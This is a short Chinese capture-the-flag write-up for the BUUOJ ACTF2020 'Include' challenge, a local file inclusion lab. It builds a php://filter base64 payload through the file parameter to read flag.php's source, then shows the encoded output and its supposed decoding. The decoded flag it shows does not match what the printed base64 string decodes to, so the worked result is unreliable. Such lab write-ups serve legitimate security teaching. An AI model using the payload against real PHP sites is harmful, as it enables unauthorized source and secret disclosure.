文件包含漏洞-Include（读取源码）

目录

• 文件包含漏洞-Include（读取代码）
  • 1.靶场环境
  • 2.然后得到对应字符串“XXXXXXX="以 = 结尾的字符串

文件包含漏洞-Include（读取代码）

1.靶场环境

• 试题地址：https://buuoj.cn/challenges#[ACTF2020 新生赛]Include

然后点击一下tips：

然后就是这些，但是url中有？file=flag.php 猜测文件包含漏洞，尝试

文件包含直接读取的是文件，而不是文件源码，所以要想办法读取源码

php://filter/read=convert.base64-encode/resource=xxx.php

这个方法可以读取代码

然后构造payload：

?file=php://filter/read=convert.base64-encode/resource=flag.php

2.然后得到对应字符串“XXXXXXX="以 = 结尾的字符串

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NWRiZmRhNTMtODUxYi00MzIwLTgxMzktMTIyYjBkOGEyNmQ0fQo=

不难看出这是base64加密的字符串，进行base64解密得到flag：

<?php
echo "Can you find out the flag?";
//flag{63e2b2c0-5f92-462e-adbf-e0588a34428c}